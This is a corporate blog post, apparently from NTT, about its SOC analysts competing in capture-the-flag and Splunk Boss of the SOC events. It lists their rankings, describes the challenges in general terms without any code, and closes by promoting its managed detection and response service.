One of the great challenges of cybersecurity is the need to learn continuously. Just as our adversaries adapt and change all the time, we need to remain one step ahead of them. This is especially true of the analysts in our SOC, who never stop learning. The SOC is the front-line where analysts are exposed to all the latest exploits developed by threat actors. That exposure, on its own, isn't enough, however. That is why our analysts are on a continuous quest to learn from their peers and from the industry.
One exciting and rewarding way for our analysts to test themselves and learn from their peers is by participating in cybersecurity competitions. These are highly competitive events where analysts get to pit themselves against peers from other organizations in events which test both their skill and their resolve to overcome adversaries in high-pressure situations. In some cases, analysts even get the chance to take on the role of the attacker, which helps them to better understand the tactics and strategies used by their adversaries.
Our SOC teams have participated in a number of cybersecurity competitions and have achieved top results in competition against other highly skilled teams. The list below lists some of our achievements in recent years.
- 9th (1st onsite) Security Fest CTF 2018 (among 400 teams)
- 1st and 2nd Splunk Boss of the SOC Helsinki 2019 (among 14 teams)
- 2nd Splunk Boss of the SOC Nordic 2020 (among 43 teams)
- 6th Splunk Boss of the SOC v6.conf21 2021(among 425 teams)
- 17th Cyber Apocalypse CTF 2022 (among 7024 teams)
- 17th Hack the Box Business CTF Dirty Money 2022 (among 657 teams)
Capture the flag (CTF) competition has become increasingly popular among cybersecurity professionals, providing a fun and engaging way to test and improve skills. To succeed in a CTF competition, participants must have a strong understanding of a wide range of security concepts and techniques. These may include cryptography, web security, reverse engineering, forensics, exploit development, and programming. Participants must use their expertise and problem-solving abilities to complete these challenges and earn points or capture the flag.
The NTT SOC team has had the opportunity to compete against several of the most respected security firms in the industry at the "Hack the Box Business CTF 2022" event. In order to successfully complete the exploitation challenge known as "Midenios" which has a difficulty of “Hard”, the participant must create a custom JavaScript payload to exploit the discovered vulnerability. The NTT analyst that was able to solve this challenge wrote a detailed blog post about it which can be found here.
Another analyst who successfully solved a malware analysis related challenge offered some great feedback on the real world value of a challenge they encountered in the same competition: “We received an email with a suspicious document attached. The document contained a malicious VBA script that attempted to download malware when the user opened it. We were able to obtain the malware and reverse engineer it to find the flag that was hidden within it.” This technique has been observed in multiple malware families, including Emotet, IceID, and Dridex.
Another popular cybersecurity competition is Boss of the SOC (BOTS) arranged by Splunk. BOTS is a cybersecurity competition that involves participants attempting to detect and respond to simulated security threats in a SOC environment. The participants are typically presented with a set of simulated network environments and are asked to detect and respond to security threats in real-time. These threats may include malware, network intrusions, and other types of cyber-attacks.
One of our team members who participated in BOTS describes “BOTS puts our threat hunting skills to the test. We got to make use of different logs, statistics, geolocation, and more to hunt for everything from APT groups to kidnapped toads." Another member added “BOTS pushed my problem-solving skills to the limit and taught me new strategies that have been useful in my role as an analyst.”
Overall, CTF and BOTS competitions provide a unique and exciting opportunity for security professionals to test and improve their skills. These competitions are challenging and engaging and can help participants to stay sharp and up-to-date on the latest security technologies and techniques. Whether you are a seasoned veteran or a newcomer to the field of security, participating in a CTF or BOTS competition can be a rewarding and valuable experience.
Cybersecurity competitions provide a competitive proving ground where our analysts can hone their skills. The experience they build from the perspective of both the defender and the attacker provides them with an invaluable edge. NTT’s Samurai Managed Detection and Response service relies on the continuous learning that our analysts undertake so that we can keep ahead of threat actors as we defend our clients.
To find out more about Samurai Managed detection and Response, reach out to our experts today.